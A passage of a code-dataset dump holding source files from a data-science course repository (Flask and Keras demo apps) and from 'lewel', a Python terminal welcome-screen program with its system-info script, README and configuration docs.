graph.as_default():\n out = model.predict(x)\n print(out[0])\n print(np.argmax(out[0]))\n r = np.argmax(out[0])\n\n return {'prediction': str(r)}\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8000)\n" }, { "alpha_fraction": 0.6806167364120483, "alphanum_fraction": 0.6828193664550781, "avg_line_length": 31.428571701049805, "blob_id": "1ab10b0580aa74d7925c2e497edc6816016f61ea", "content_id": "c8a8f4ba0da4a1dcc2a3813ae9720ccecfb3cede", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 454, "license_type": "permissive", "max_line_length": 74, "num_lines": 14, "path": "/flask_demo/day1.py", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "import math\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Volume of a Cylinder\")\nparser.add_argument('-r', '--radius', type=int, help='Radius of Cylinder')\nparser.add_argument('-H', '--height', type=int, help='Height of Cylinder')\nargs = parser.parse_args()\n\ndef cylinder_volume(radius, height):\n vol = (math.pi) * (radius**2) * (height)\n return vol\n\nif __name__ == '__main__':\n print(cylinder_volume(args.radius, args.height))\n" }, { "alpha_fraction": 0.7790697813034058, "alphanum_fraction": 0.7965116500854492, "avg_line_length": 33.400001525878906, "blob_id": "ec29ff0f3ca5ac5470a19fdc34d27a7eb7208a7c", "content_id": "47953082ad215b48d7455407f88144f77d9d07da", 
"detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 172, "license_type": "permissive", "max_line_length": 106, "num_lines": 5, "path": "/Lessons/BigDataStorage.md", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# Big Data Storage\n\nPlease open the following Jupyter Notebook:\n\nhttps://github.com/Make-School-Courses/DS-2.3-Data-Science-in-production/blob/master/Lessons/S3_Boto.ipynb\n" }, { "alpha_fraction": 0.6265060305595398, "alphanum_fraction": 0.759036123752594, "avg_line_length": 10.857142448425293, "blob_id": "0e8b871a34ffd84589dccc5a335efe839a511800", "content_id": "7a42d1e51ac114be4490200902422de0cd3d4da6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 83, "license_type": "permissive", "max_line_length": 18, "num_lines": 7, "path": "/Docker_demo/DL_version/requirements.txt", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "flask\nflask_restplus\ntensorflow==1.14.0\nkeras==2.2.4\nnumpy\nPillow\nWerkzeug==0.16.1\n" }, { "alpha_fraction": 0.5842068195343018, "alphanum_fraction": 0.5939902067184448, "avg_line_length": 25.0181827545166, "blob_id": "568cbf04decbbd9632435df04a3831a188c19198", "content_id": "374a43474ee5d193c84cc5a9f3b2fa4c24eea46c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2862, "license_type": "permissive", "max_line_length": 99, "num_lines": 110, "path": "/flask_demo/app.py", "repo_name": "Jeromeschmidt/DS-2.3-Data-Science-in-Production", "src_encoding": "UTF-8", "text": "# from flask import Flask, request, render_template\n#\n# app = Flask(__name__)\n#\n# @app.route('/')\n# def my_form():\n# return render_template('my-form.html')\n#\n# @app.route('/', methods=['POST'])\n# def my_form_post():\n# num = int(request.form['text'])\n# new_num = num+2\n# return new_num\n\n# from flask import Flask, request\n# from datetime import datetime\n#\n# app = Flask(__name__)\n#\n# @app.route('/')\n# def hello():\n# num = int(request.args['num']) + 2\n# return \"\"\"\n# <html><body>\n# <h1>{0}</h1>\n# </body></html>\n# \"\"\".format(\n# str(num))\n#\n# # Launch the FlaskPy dev server\n# app.run(host=\"localhost\", debug=True)\n\n# from flask import Flask, request, jsonify\n# app = Flask(__name__)\n#\n#\n# def summation(a, b):\n# return a + b\n#\n#\n# @app.route('/', methods=['GET'])\n# def my_route():\n# n = request.args.get('n', type=int)\n# m = request.args.get('m', type=int)\n# r = summation(n, m)\n# print(r)\n# return jsonify({'add': r})\n#\n#\n# if __name__ == \"__main__\":\n# app.run(host='0.0.0.0', port=5000)\n\n# from flask import Flask, render_template, request\n# from wtforms import Form, FloatField, validators\n# import math\n#\n# app = Flask(__name__)\n#\n# # Model\n# class InputForm(Form):\n# r = FloatField(validators=[validators.InputRequired()])\n#\n# def compute(r):\n# return math.sin(r)\n# # View\n# @app.route('/hw1', methods=['GET', 'POST'])\n# def index():\n# form = InputForm(request.form)\n# if request.method == 'POST' and form.validate():\n# r = form.r.data\n# s = compute(r)\n# return render_template(\"view_output.html\", form=form, s=s)\n# else:\n# return render_template(\"view_input.html\", form=form)\n#\n# if __name__ == '__main__':\n# app.run(debug=True)\n\nfrom flask_restplus import Api, Resource, fields\nfrom flask import Flask, jsonify, request, make_response, 
abort, render_template, redirect, url_for\n\napp = Flask(__name__)\napi = Api(app, version='1.0', title='MuseFind Tagging API', description='Automated Tagging By NLP')\nns = api.namespace('MuseFind_api', description='Methods')\nsingle_parser = api.parser()\nsingle_parser.add_argument('n', type=int, required=True, help= 'first number')\nsingle_parser.add_argument('m', type=int, required=True, help= 'second number')\n\n\ndef summation(a, b):\n return a+b\n\n\[email protected]('/addition')\nclass Addition(Resource):\n \"\"\"Uploads your data to the recommender system\"\"\"\n @api.doc(parser=single_parser, description='Enter Two Integers')\n def get(self):\n \"\"\"Uploads a new transaction to Rex (Click to see more)\"\"\"\n args = single_parser.parse_args()\n n1 = args.n\n m1 = args.m\n r = summation(n1, m1)\n print(r)\n return {'add': r}\n\n\nif __name__ == '__main__':\n # app.run(host='0.0.0.0', port=3000)\n app.run(debug=True)\n" } ]
10
pintard/lewel
https://github.com/pintard/lewel
9a22f4085f3f50d30075bf224c6936b95695c112
9fcea61dd7531eede5617e3b65e791b2271e0970
c8416023d24e25a15713944ca2b76948918e4760
refs/heads/master
2023-06-09T10:02:50.551897
2021-07-03T14:04:14
2021-07-03T14:04:14
382,598,616
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5707039833068848, "alphanum_fraction": 0.5838456749916077, "avg_line_length": 34.55191421508789, "blob_id": "389b90971cd728faa58e0cc5fec1cd52853a51f2", "content_id": "2e8db4b08d5cb7d7c40989f7db67f49ff5f0ef97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13034, "license_type": "no_license", "max_line_length": 108, "num_lines": 366, "path": "/bin/detailer.py", "repo_name": "pintard/lewel", "src_encoding": "UTF-8", "text": "import sys, os\nfrom json import load\n\n# Configurations\nmain_directory = os.path.dirname(__file__)\nabsolute_path = os.path.join(main_directory, \"config/config.json\")\nwith open(absolute_path) as config_file:\n config_data = load(config_file)\n# Manipulation\nwelcome_message = config_data[\"welcome_message\"]\ndate_format = config_data[\"date_format\"]\nuptime_format = config_data[\"uptime_format\"]\nmemory_format = config_data[\"memory_format\"]\npf_result = config_data[\"pf_result\"]\nshould_display_blocks = config_data[\"should_display_blocks\"]\nshould_display_text = config_data[\"should_display_text\"]\nshould_display_keys = config_data[\"should_display_keys\"]\ncolor_block_node = config_data[\"color_block_node\"]\ndivider_node = config_data[\"hr_divider_node\"]\ndivider_repeat = config_data[\"hr_node_repeat\"]\nbullets = {\n \"DEFAULT\": config_data[\"default_bullet\"],\n \"INTERFACE\": config_data[\"interface_bullet\"],\n \"MACHINE\": config_data[\"machine_bullet\"],\n \"SHELL\": config_data[\"shell_bullet\"],\n \"CPU\": config_data[\"cpu_bullet\"],\n \"RAM\": config_data[\"ram_bullet\"],\n \"UPTIME\": config_data[\"uptime_bullet\"],\n \"DATE\": config_data[\"date_bullet\"]\n}\nword_wrap = config_data[\"word_wrap\"]\n# Colors\nuser_ = config_data[\"user_string_color\"]\nmachine_ = config_data[\"machine_string_color\"]\nhr_ = config_data[\"hr_color\"]\nkey_ = config_data[\"detail_key_color\"]\nval_ = config_data[\"detail_value_color\"]\ntxt_ = config_data[\"text_description_color\"]\nbullet_ = {\n \"DEFAULT\": config_data[\"default_bullet_color\"],\n \"INTERFACE\": config_data[\"interface_bullet_color\"],\n \"MACHINE\": config_data[\"machine_bullet_color\"],\n \"SHELL\": config_data[\"shell_bullet_color\"],\n \"CPU\": config_data[\"cpu_bullet_color\"],\n \"RAM\": config_data[\"ram_bullet_color\"],\n \"UPTIME\": config_data[\"uptime_bullet_color\"],\n \"DATE\": config_data[\"date_bullet_color\"]\n}\n# Overrides\ninterface_override = config_data[\"interface_override\"]\nmachine_override = config_data[\"machine_override\"]\nshell_override = config_data[\"shell_override\"]\ncpuram_override = config_data[\"cpuram_override\"]\nuptime_override = config_data[\"uptime_override\"]\ndate_override = config_data[\"date_override\"]\n# FG Escape sequences\nCOLORS = {\n \"black\": \"\\x1b[30m\",\n \"red\": \"\\x1b[31m\",\n \"green\": \"\\x1b[32m\",\n \"yellow\": \"\\x1b[33m\",\n \"blue\": \"\\x1b[34m\",\n \"magenta\": \"\\x1b[35m\",\n \"cyan\": \"\\x1b[36m\",\n \"white\": \"\\x1b[37m\",\n \"light black\": \"\\x1b[90m\",\n \"light red\": \"\\x1b[91m\",\n \"light green\": \"\\x1b[92m\",\n \"light yellow\": \"\\x1b[93m\",\n \"light blue\": \"\\x1b[94m\",\n \"light magenta\": \"\\x1b[95m\",\n \"light cyan\": \"\\x1b[96m\",\n \"light white\": \"\\x1b[97m\"\n}\nEND = \"\\x1b[0m\"\nBOLD = \"\\x1b[1m\"\nITALIC = \"\\x1b[3m\"\nUNDERLINE = \"\\x1b[4m\"\n\n\n# Returns the user preferred color string\ndef color_(string_color):\n try:\n return COLORS[string_color]\n except KeyError:\n print(\"The color \" 
+ COLORS[\"red\"] + \"\\\"\" + string_color + \"\\\"\" + END + \\\n \" is not a valid color. pls refer to gh page or doc for valid colors\")\n sys.exit(0)\n\n\n# Return machine make and model\ndef get_make_manufacture():\n from subprocess import run # for manufacture\n if sys.platform == (\"linux\" or \"linux2\"):\n return \"Linux\"\n elif sys.platform == \"darwin\":\n sys_info = run([\n \"system_profiler\",\n \"SPHardwareDataType\"\n ], capture_output=True).stdout.decode()\n start_string = \"Model Name: \"\n start_index = sys_info.find(start_string) + len(start_string)\n return sys_info[start_index: sys_info.find(\"\\n\", start_index)]\n elif sys.platform == \"win32\":\n return \"Windows\"\n return sys.platform\n\n\n# Returns os string \"OS: macOS Big Sur v11.0.1\"\ndef get_osstring():\n from subprocess import run # for version\n osname = \"\"\n osversion = \"\"\n osversionname = \"\"\n if sys.platform == (\"linux\" or \"linux2\"):\n osname = \"Linux\"\n elif sys.platform == \"darwin\":\n osversion = run([\"sw_vers\", \"-productVersion\"], capture_output=True).stdout.decode().strip('\\n')\n if osversion[0:5] == \"10.14\":\n osversionname = \"Mojave\"\n elif osversion[0:5] == \"10.15\":\n osversionname = \"Catalina\"\n elif osversion[0:4] == \"11.0\":\n osversionname = \"Big Sur\"\n osname = \"macOS\"\n elif sys.platform == \"win32\":\n osname = \"Windows\"\n else:\n osname = sys.platform\n return osname + \" \" + osversionname + \" \" + osversion\n\n\n# Returns system uptime\ndef get_uptime():\n from subprocess import check_output # for uptime\n uptime_string = check_output('uptime').decode().replace(',', '').split()\n if any(s in uptime_string for s in ['day','days']):\n days = int(uptime_string[2])\n if any(s in uptime_string for s in ['min', 'mins']):\n hrs = 0\n mins = uptime_string[4]\n else:\n hrs, mins = map(int, uptime_string[4].split(':'))\n elif any(s in uptime_string for s in ['min', 'mins']):\n days = 0\n hrs = 0\n mins = int(uptime_string[4])\n elif any(s in uptime_string for s in ['hr', 'hrs']):\n days = int(uptime_string[2])\n hrs = int(uptime_string[4])\n mins = 0\n else:\n days = 0\n hrs, mins = map(int, uptime_string[2].split(':'))\n if uptime_format == \"hours\":\n tot_hrs = (days * 24) + hrs\n return str(tot_hrs) + \" hrs, \" + str(mins) + \" mins\"\n elif uptime_format == \"days\":\n return str(days) + \" days, \" + str(hrs) + \" hrs\"\n elif uptime_format == \"colon\":\n return \"{}:{}:{}\".format(days, hrs, mins)\n return str(days) + \" days, \" + str(hrs) + \" hrs, \" + str(mins) + \" mins\"\n\n\n# Returns current date string\ndef get_date():\n from datetime import datetime # for date display\n if date_format == \"full\":\n return datetime.now().strftime(\"%b %d, %Y\")\n elif date_format == \"mmddyy\":\n return datetime.now().strftime(\"%m / %d / %y\")\n elif date_format == \"daydd\":\n return datetime.now().strftime(\"%A \" + BOLD + \"%d\" + END)\n\n\n# Returns shell string ZSH 5.8\ndef get_shellstring():\n from os import environ # for machine info\n from subprocess import run # shell version\n shell_type = environ['SHELL'].split('/')[-1].upper()\n current_version = \"\"\n if shell_type == \"ZSH\":\n shell_version = run([\"zsh\", \"--version\"], capture_output=True).stdout.decode()\n maybe_version = []\n for text in shell_version.split():\n try:\n maybe_version.append(float(text))\n except ValueError:\n pass\n if len(maybe_version) == 1:\n current_version = str(maybe_version[0])\n if shell_type == \"BASH\":\n shell_version = run([\"bash\", \"--version\"], 
capture_output=True).stdout.decode()\n start_string = \"version \"\n start_index = shell_version.find(start_string) + len(start_string)\n end_string = \"(1)\"\n current_version = shell_version[start_index: shell_version.find(end_string)]\n return shell_type + \" \" + current_version\n\n\n# Returns user string \"User \\ machine\"\ndef get_userstring():\n from os import environ, uname # for machine info\n username = environ['USER'].upper()\n hostname = uname()[1]\n return color_(user_) + BOLD + username + END + \\\n color_(machine_) + \" \\ \" + hostname + END\n\n\n# Returns system usage\ndef get_usage(choice):\n from psutil import virtual_memory # for performance data\n cpu_use_string = \"\"\n ram_use_string = \"\"\n # Unit conversions\n divider = 2**30 # 1e+9\n if memory_format[1] == \"MiB\":\n divider = 2**20 # 1e+6\n # Actual values\n total = virtual_memory().total / divider\n available = virtual_memory().available / divider\n used = total - available\n # Actual percentages\n cpu_use_percent = available * 100 / total\n ram_use_percent = virtual_memory().percent\n if memory_format[0] == \"percent\":\n cpu_use_string = \"{:.2f} %\".format(cpu_use_percent)\n ram_use_string = \"{:.2f} %\".format(ram_use_percent)\n elif memory_format[0] == \"values\":\n cpu_use_string = \"{:.2f} / {:.0f} {}\".format(available, total, memory_format[1])\n ram_use_string = \"{:.2f} / {:.0f} {}\".format(used, total, memory_format[1])\n elif memory_format[0] == \"both\":\n cpu_use_string = \"{:.2f} / {:.0f} {} \".format(available, total, memory_format[1]) + \\\n BOLD + \"({:.2f}%)\".format(cpu_use_percent)\n ram_use_string = \"{:.2f} / {:.0f} {} \".format(used, total, memory_format[1]) + \\\n BOLD + \"({:.2f}%)\".format(ram_use_percent)\n return cpu_use_string if choice == \"CPU\" else ram_use_string\n\n\n# Returns the color blocks for ANSI 1-16\ndef blocks_(type):\n x = 0\n y = 0\n if len(color_block_node.strip()) == 0:\n x = 4\n y = 10\n else:\n x = 3\n y = 9\n blocks = \"\"\n if type == \"normal\":\n for i in range(8):\n blocks += \"\\x1b[{}{}m\".format(x, i) + color_block_node + END\n elif type == \"bright\":\n for i in range(8):\n blocks += \"\\x1b[{}{}m\".format(y, i) + color_block_node + END\n if should_display_blocks == True:\n return blocks\n else:\n return \"\"\n\n\n# Returns folded paragraph in array of sentences\ndef fold_paragraph(para):\n num_lines = len(para) / word_wrap # of lines\n if num_lines > round(num_lines) and num_lines % round(num_lines) > 0:\n num_lines += 1 - num_lines % round(num_lines)\n else:\n num_lines = round(num_lines)\n words = para.split(' ')\n columns_counted = 0\n temp_words = []\n sentences = []\n for word in words:\n if columns_counted <= word_wrap:\n columns_counted += len(word) + 1 # +1 space\n temp_words.append(word)\n if columns_counted >= word_wrap:\n columns_counted = 0\n if columns_counted == 0:\n sentence = ' '.join(temp_words)\n sentences.append(sentence)\n temp_words = []\n if len(sentences) < num_lines:\n para_sofar = ' '.join(sentences)\n remainder = para.replace(para_sofar, \" \").strip()\n if len(remainder) > 0:\n sentences.append(remainder)\n for i, sentence in enumerate(sentences):\n sentences[i] = ITALIC + color_(txt_) + sentence + END\n return sentences\n\n\n# Return detail string \"NAME: detail information\"\ndef detail(name, content):\n bullet = bullets[\"DEFAULT\"]\n bullet_color = bullet_[\"DEFAULT\"]\n if bullets[name] != \"\":\n bullet = bullets[name]\n if bullet_[name] != \"\":\n bullet_color = bullet_[name]\n spaces = \" \" * (12 - len(name))\n if 
should_display_keys == True:\n return (color_(bullet_color) + \"{}\" + color_(key_) + BOLD + \"{}\" + END + spaces + \\\n color_(val_) + \"{}\" + END).format(bullet, name, content)\n else:\n return (color_(bullet_color) + \"{}\" + END + \" \" + color_(val_) + \"{}\" + END).format(bullet, content)\n\n\n\n# Empty line\nempty_line = ''\n# ∙∙∙∙∙∙∙∙∙∙∙\ndivider_line = color_(hr_) + divider_node * divider_repeat + END\n\n\n# Manipulate displayed data here\ndef detail_list():\n # Initialization details\n init_data = {}\n userstring = \"\"\n osstring = \"\"\n make_manufacture = \"\"\n shellstring = \"\"\n try:\n abs_path = os.path.join(main_directory, \".assist/details.json\")\n with open(abs_path) as detail_file:\n init_data = load(detail_file)\n userstring = init_data[\"userstring\"]\n osstring = init_data[\"osstring\"] if interface_override == \"\" else interface_override\n make_manufacture = init_data[\"make_manufacture\"] if machine_override == \"\" else machine_override\n shellstring = init_data[\"shellstring\"] if shell_override == \"\" else shell_override\n except FileNotFoundError:\n print(\"Details not found... please initialize program with \" + \\\n COLORS[\"light green\"] + \"lewel init\" + END)\n sys.exit(0)\n details = [\n blocks_(\"normal\"),\n blocks_(\"bright\"),\n empty_line,\n userstring,\n divider_line,\n detail(\"INTERFACE\", osstring),\n detail(\"MACHINE\", make_manufacture),\n detail(\"SHELL\", shellstring),\n detail(pf_result, get_usage(pf_result)),\n detail(\"UPTIME\", get_uptime()),\n detail(\"DATE\", get_date()),\n empty_line,\n ITALIC + color_(txt_) + welcome_message + END\n ]\n if cpuram_override is False:\n del details[-5]\n if uptime_override is False:\n del details[-4]\n if date_override is False:\n del details[-3]\n if should_display_text == False:\n del details[details.index(blocks_(\"bright\"))+1:-1]\n if should_display_blocks == False:\n del details[0:details.index(userstring)]\n if len(welcome_message) > word_wrap:\n del details[-1]\n sentences = fold_paragraph(welcome_message)\n details.extend(sentences)\n return details\n" }, { "alpha_fraction": 0.6321295499801636, "alphanum_fraction": 0.6459108591079712, "avg_line_length": 31.80858039855957, "blob_id": "bb0c0840f53d1e80e906a88fb55b896c43e0e103", "content_id": "9d4c81f8b985e6b76b8fb30314bfab0b9932f381", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9995, "license_type": "no_license", "max_line_length": 366, "num_lines": 303, "path": "/README.md", "repo_name": "pintard/lewel", "src_encoding": "UTF-8", "text": "# **lewel**\n\nlewel is a terminal diagnostic and welcome screen program written in python. So far it has support for macOS devices running python3 and macOS version 11.0.1 (2/20).\n\n![sample image](sample.png)\n\n## **TABLE OF CONTENTS**\n\n[I. Usage](#Usage)\n\n1. [Getting Started](#GETTING-STARTED)\n2. [Commands](#COMMANDS)\n\n[II. Configurations](#Configurations)\n\n1. [Images](#IMAGES)\n2. [Display](#DISPLAY)\n3. [Positioning](#POSITIONING)\n4. [Date](#DATE)\n5. [Uptime](#UPTIME)\n6. [Memory & Performance](#MEMORY-AND-PERFORMANCE)\n7. [Colors](#COLORS)\n\n---\n\n## Usage\n\n### [**GETTING STARTED**](#TABLE-OF-CONTENTS)\n\nThe use of the program is simply to display a welcome screen so to get started is as simple as typing: `lewel init`. 
After answering the prompted questions to select your image or prexel, you can then type `lewel`.\n\nTo make sure lewel loads every time your window is opened, you have to call it in your `.zshrc`, `.bashrc`, `.bash_profile` (which is typically found in your `$HOME` directory as a hidden file, or `/Users/user`), or whatever shell source file you're using. To make this call automatically on each launch, place the following at the very top of the aforementioned file:\n\n**NOTE:** It's best practice to run the lewel program in your shell configuration file only after you've initialized\nit for the very first time.\n\n```zsh\nexport PATH=\"$PATH:$HOME/.lewel/bin\"\nlewel # run lewel\n```\n\n### [**COMMANDS**](#TABLE-OF-CONTENTS)\n\n| **COMMAND SEQ** | **DEFINITION** |\n|-----------------------|---------------------------------------------------------------------|\n| `$ lewel` | will print the welcome screen to terminal |\n| `$ lewel init` | will init/reinitialize the program. useful for adding/changing pics |\n| `$ lewel reset` | will reset the program excluding configuration details |\n| `$ lewel config` | will run the command line configuration wizard |\n| `$ lewel config open` | will open configuration file in default text editor/application |\n| `$ lewel config vim` | will open configuration file in vim text editor |\n| `$ lewel help` | will print this help message |\n\n---\n\n## Configurations\n\nThis program is configurable to tailor your own message. Check `config.json` and make changes according to the valid options listed below.\n\n**IMPORTANT:** Deleting any of the `config.json` keys or values can result in breaking the program, so it is advised that users only make the suggested changes, leaving keys untouched and perhaps nullifying corresponding values if the description of this manual says you're allowed to do so.\n\n**NOTE:** Some configuration changes take effect as soon as you make changes to the config.json file or the configuration\nwizard. 
For changes not readily noticeable, it is advised that you run `lewel init` and simply press any key so the\nprogram can recognize the latest changes to the configuration file.\n\nIf you find yourself in need of a fresh `config.json`, create a new file named \"config.json\" with the following content:\n\n```json\n{\n \"welcome_message\": \"\",\n \"date_format\": \"full\",\n \"uptime_format\": null,\n \"memory_format\": [\n \"values\",\n \"MiB\"\n ],\n \"pf_result\": \"RAM\",\n \"should_display_image\": true,\n \"should_display_blocks\": true,\n \"should_display_text\": true,\n \"should_display_keys\": true,\n \"color_block_node\": \" \",\n \"space_before\": 8,\n \"space_after\": 6,\n \"lines_before\": 2,\n \"lines_after\": 2,\n \"hr_divider_node\": \"\\u2219\",\n \"hr_node_repeat\": 38,\n \"default_bullet\": \"\",\n \"interface_bullet\": \"\\ufb32 \",\n \"machine_bullet\": \"\\uf109 \",\n \"shell_bullet\": \"\\uf489 \",\n \"cpu_bullet\": \"\\ue266 \",\n \"ram_bullet\": \"\\ue266 \",\n \"uptime_bullet\": \"\\uf017 \",\n \"date_bullet\": \"\\uf073 \",\n \"word_wrap\": 30,\n \"user_string_color\": \"light yellow\",\n \"machine_string_color\": \"light green\",\n \"hr_color\": \"light blue\",\n \"detail_key_color\": \"yellow\",\n \"detail_value_color\": \"light white\",\n \"text_description_color\": \"light green\",\n \"default_bullet_color\": \"red\",\n \"interface_bullet_color\": \"blue\",\n \"machine_bullet_color\": \"light red\",\n \"shell_bullet_color\": \"light magenta\",\n \"cpu_bullet_color\": \"yellow\",\n \"ram_bullet_color\": \"light green\",\n \"uptime_bullet_color\": \"light white\",\n \"date_bullet_color\": \"light blue\",\n \"interface_override\": \"\",\n \"machine_override\": \"\",\n \"shell_override\": \"\",\n \"cpuram_override\": true,\n \"uptime_override\": true,\n \"date_override\": true\n}\n```\n\n---\n\n### [**IMAGES**](#TABLE-OF-CONTENTS)\n\nDo you want to display a picture? `true` or `false`\n\n```python\nshould_display_image = True\n\n# OR\n\nshould_display_image = False\n```\n\nInsert the path to your display image in this variable.\n\n```python\npath_to_image = \"sample.jpg\"\n```\n\nThe width and height of the picture, in number of terminal cursor blocks. The suggested width-to-height ratio is roughly 3:1.\n\n```python\n# Dimension ratio 40/14 = 2.86 ~> 3.0\n# Appropriate for terminal welcome screen\nwidth = 40\nheight = 14\n```\n\n---\n\n### [**DISPLAY**](#TABLE-OF-CONTENTS)\n\nDo you want to display the ANSI color blocks or the textual information? `true` or `false`\n\n```python\n# The size of the color block\ncolor_block_size = 4\n# xterm color theme in ANSI blocks\nshould_display_blocks = True\n# All of the system information text\nshould_display_text = False\n```\n\n- You can add a brief welcome message to your lewel; nothing is printed if the field is left empty. The message can extend past the height of the provided image (if there is one), so its length is effectively unlimited.\n\n- The column at which to wrap your welcome message, in approximate characters (rounded to the nearest word)\n\n```python\n# Your custom message\nwelcome_message = \"Welcome to your terminal\"\n# Word wrapping\nword_wrap = 30\n```\n\n- You can set a divider between your username and your relevant data. The \"node\" for this divider can be any character. Common characters are '`-`', '`*`' and '`#`'; the default choice for lewel is '`∙`' (U+2219). 
You can also choose how frequently you want this node repeated, given as an integer.\n\n- You can also set a preferred bullet point for all of the detail keys; in this configuration you can set whichever character and space combination you'd like, within reason.\n\n```python\n# Choice of divider node ∙∙∙∙∙\nhr_divider_node = \"∙\"\n# Number of times to repeat\nhr_node_repeat = 32\n# Detail key bullet point\nbullet = \"- \"\n```\n\n---\n\n### [**POSITIONING**](#TABLE-OF-CONTENTS)\n\nYou can control where your pictures or text lie on the screen through the use of cursor spaces and carriage returns. These options take integer values:\n\n```python\n# The space before picture or text\nspace_before = 6\n# The space after picture\nspace_after = 8\n# Number of lines before message\nlines_before = 1\n# Number of lines after message\nlines_after = 1\n```\n\nThis is helpful for combinations involving the choice of display for images, text and color blocks.\n\n---\n\n### [**DATE**](#TABLE-OF-CONTENTS)\n\nYou can add a date in any of the following formats: `full`, `mmddyy`, or `daydd`.\n\n```python\ndate_format = \"daydd\"\n```\n\nThe options render the following outputs:\n\n| OPTION | DISPLAY |\n|----------|---------------|\n| `full` | Jan 01, 2020 |\n| `mmddyy` | 01 / 01 / 20 |\n| `daydd` | Wednesday 01 |\n\n---\n\n### [**UPTIME**](#TABLE-OF-CONTENTS)\n\nYou can add a computer **uptime** display in any of the following formats: `days`, `hours`, or `colon`.\n\n```python\nuptime_format = \"days\"\n```\n\nThe options render the following outputs:\n\n| OPTION | DISPLAY |\n|---------|-------------------------|\n| `null` | 40 days, 1 hrs, 12 mins |\n| `days` | 20 days, 20 hrs |\n| `hours` | 300 hrs, 6 mins |\n| `colon` | 12:02:34 |\n\n---\n\n### [**MEMORY AND PERFORMANCE**](#TABLE-OF-CONTENTS)\n\nYou can choose to display either CPU performance or RAM performance, as `CPU` or `RAM`, using the performance result variable `pf_result` below:\n\n```python\npf_result = \"CPU\"\n```\n\nYou can display this information using a format combination as described in the array below:\n\n```python\nmemory_format = [\"values\", \"MiB\"]\n```\n\nThe option in the first index of the memory format array controls the template form of the display, and the second index controls the unit value. The unit value can either be defined as Mebibyte `MiB` or Gigabyte `GB`. The template forms are either `percent`, `values` or `both`. Their displays are as shown:\n\n| OPTION 1 | OPTION 2 | DISPLAY |\n|-----------|--------------|----------------------|\n| `percent` | `GB` / `MiB` | 24.81 % |\n| `values` | `MiB` | 2089.54 / 8192 MiB |\n| `both` | `GB` | 2.20 / 8 GB (27.49%) |\n\n---\n\n### [**COLORS**](#TABLE-OF-CONTENTS)\n\nYou can customize lewel with a preferred color for several of the detail text components. These colors are the templated 16-choice colors your terminal uses. 
To modify these specific colors, you will have to change the corresponding ANSI color in your terminal profile (located usually in the settings of your emulator).\n\nThe following color values are:\n\n| **Normal** | **Light** |\n|------------|---------------|\n|black | light black |\n|red | light red |\n|green | light green |\n|yellow | light yellow |\n|blue | light blue |\n|magenta | light magenta |\n|cyan | light cyan |\n|white | light white |\n\nAll of the color related mutable objects are as follows:\n\n```python\n# USER /\nuser_string_color: \"red\"\n# / host\nmachine_string_color: \"light red\"\n# ∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙∙\nhr_color: \"cyan\"\n# OS, MACHINE, SHELL\ndetail_key_color: \"blue\"\n# ZSH 5.X, [Date info]\ndetail_value_color: \"light blue\"\n# Blah blah blah blah blah blah blah blah\ntext_description_color: \"light green\"\n```\n" }, { "alpha_fraction": 0.8095238208770752, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 5.666666507720947, "blob_id": "245a9ce7348ec1a44df702807659206b1f758d6c", "content_id": "f176def2f6e21738aeb73f5757227797b4ffb08d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 21, "license_type": "no_license", "max_line_length": 6, "num_lines": 3, "path": "/requirements.txt", "repo_name": "pintard/lewel", "src_encoding": "UTF-8", "text": "pillow\r\nnumpy\r\npsutil" }, { "alpha_fraction": 0.4927210807800293, "alphanum_fraction": 0.5043094158172607, "avg_line_length": 39.25364303588867, "blob_id": "9a3503ef64ffcba38f81f75bc81e3fdc9bac045e", "content_id": "803ee60e84a3548a8ff360e3a355f552cc03638a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13807, "license_type": "no_license", "max_line_length": 113, "num_lines": 343, "path": "/bin/lewel", "repo_name": "pintard/lewel", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# coding: utf-8\nimport sys\nimport os\nfrom json import load, dump, decoder\n\n\nclass NORMAL:\n black = \"\\x1b[30m\"\n red = \"\\x1b[31m\"\n green = \"\\x1b[32m\"\n yellow = \"\\x1b[33m\"\n blue = \"\\x1b[34m\"\n magenta = \"\\x1b[35m\"\n cyan = \"\\x1b[36m\"\n white = \"\\x1b[37m\"\n\n\nclass LIGHT:\n black = \"\\x1b[90m\"\n red = \"\\x1b[91m\"\n green = \"\\x1b[92m\"\n yellow = \"\\x1b[93m\"\n blue = \"\\x1b[94m\"\n magenta = \"\\x1b[95m\"\n cyan = \"\\x1b[96m\"\n white = \"\\x1b[97m\"\n\n\nEND = \"\\x1b[0m\"\nshadow_image = \".assist/.plew\"\n\n\n# Configurations\nmain_directory = os.path.dirname(__file__)\njson_path = os.path.join(main_directory, \"config/config.json\")\ntry:\n with open(json_path) as config_file:\n config_data = load(config_file)\n should_display_image = config_data[\"should_display_image\"]\n should_display_text = config_data[\"should_display_text\"]\n should_display_blocks = config_data[\"should_display_blocks\"]\n space_before = config_data[\"space_before\"]\n space_after = config_data[\"space_after\"]\n lines_before = config_data[\"lines_before\"]\n lines_after = config_data[\"lines_after\"]\nexcept FileNotFoundError:\n print(LIGHT.red + \"Configuration file missing. Reinstall or find configuration in README\" + END)\n sys.exit(0)\nexcept decoder.JSONDecodeError:\n print(LIGHT.red + \"Configuration file corrupted. 
